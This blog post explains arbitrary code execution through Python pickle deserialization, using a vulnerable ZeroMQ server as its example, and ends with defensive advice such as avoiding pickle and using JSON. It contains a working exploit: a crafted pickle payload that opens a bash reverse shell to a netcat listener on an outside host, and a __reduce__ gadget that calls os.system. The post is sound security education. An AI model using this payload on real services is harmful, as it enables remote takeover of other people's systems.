Reading about the latest vulnerabilities in Rails, got me thinking about a similar issue we have in Python.
It is well known that using pickle on untrusted data is insecure to the point of allowing arbitrary code execution. Or at least it should be.
If we head to the official documentation for pickle we’ll find this warning:
Warning: The pickle module is not intended to be secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source.
Now, how many of us check the official pickle documentation (or the official docs for any other module) every time we’re going to use it? Even if we’ve read that warning before, it’s easy to forget it and mistake pickle for any other serialization format (specially when solving a problem for which pickle is just a tool). We might even be using someone else’s code that unpickles insecure data.
Pickle as a vulnerability
As a sanity check, to see if I was being paranoid, I went over to GitHub and ran a search for “pickle.loads” which lead to 36,375 results. After that, it took about 10 minutes to find a vulnerable project and exploit the vulnerability (actual code used by companies, not just some learn_pickle_test.py
). I also found many “potentially vulnerable” projects, but didn’t taking the time to try to demonstrate the issue on each of them.
Exploiting the vulnerability
The vulnerable code looks something like this:
import zmq
import cPickle as pickle
class Server(object):
def __init__(self):
context = zmq.Context()
self.receiver = context.socket(zmq.PULL)
self.receiver.bind("tcp://*:1234")
self.sender = context.socket(zmq.PUSH)
self.sender.bind("tcp://*:1235")
def send(self, data):
self.sender.send(pickle.dumps(data))
def recv(self):
data = self.receiver.recv()
return pickle.loads(data)
server = Server()
server.recv()
nc -l -p 9000
on an accessible server and running:
import sys
import zmq
def main():
server_host = '98.76.54.32'
netcat_host = '12.34.56.78'
context = zmq.Context()
zmq_socket = context.socket(zmq.PUSH)
zmq_socket.connect('tcp://%s:1234' % server_host)
shellcode = "cposix\nsystem\np0\n(S'/bin/bash -i >& /dev/tcp/%s/9000 0>&1'\np1\ntp2\nRp3\n." % netcat_host
zmq_socket.send(shellcode)
# we get a reverse shell on the netcat host
if __name__ == "__main__":
main()
import os
import cPickle
# Exploit that we want the target to unpickle
class Exploit(object):
def __reduce__(self):
return (os.system, ('ls',))
shellcode = cPickle.dumps(Exploit())
print shellcode
__reduce__
method.
Protecting ourselves
Only unpickle stuff you pickled yourself
This is harder than it sounds. Initially we could trust things that come from our own server (i.e.: if it’s in the DB, redis, the cache, etc, then I can trust it), but if someone has access to manipulate them, then they can also exploit this vulnerability. An example would be getting the server above to only accept conections from localhost, but run it on shared hosting.
Just avoid pickle
The easiest way of protecting ourselves is to not use pickle unless it’s actually necessary, and to check our dependencies to see if they are vulnerable to these (and other) atacks. If all we need is a serialization format for data, JSON is probably enough.
Don’t trust anyone
This is just another case of atackers using unvalidated data to break into our system. As with any user submited data, we need to somehow make sure that it is not being spoofed and/or that our code can handle malicious data graciously (also, harder than it sounds).
Better interfaces
The best way to avoid seeing any vulnerability in the wild is to educate ourselves to know when a piece of code is vulnerable. As API developers, a way of doing this is making sure that unsafe actions raise the necessary warnings or are self-documenting. In the case of pickle I’d like to see:
>>> with insecure_deserialization:
... pickle.loads(x)
{}
# or
>>> pickle.loads(s)
SecurityWarning: Never unpickle data received from an untrusted or unauthenticated source.
{}
# or
>>> pickle.load_trusted_string(s)
{}